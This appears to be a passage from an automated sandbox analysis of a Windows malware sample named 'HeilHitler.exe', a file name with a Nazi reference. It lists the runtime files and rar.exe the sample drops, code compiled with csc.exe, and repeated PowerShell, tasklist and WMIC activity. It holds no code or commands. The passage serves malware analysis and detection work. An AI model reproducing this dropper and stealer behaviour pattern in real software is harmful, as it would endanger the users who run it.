              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\python310.dllJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\libssl-1_1.dllJump to dropped file
              Source: C:\Users\user\Desktop\HeilHitler.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI74322\_sqlite3.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.dllJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D65830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF633D65830
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
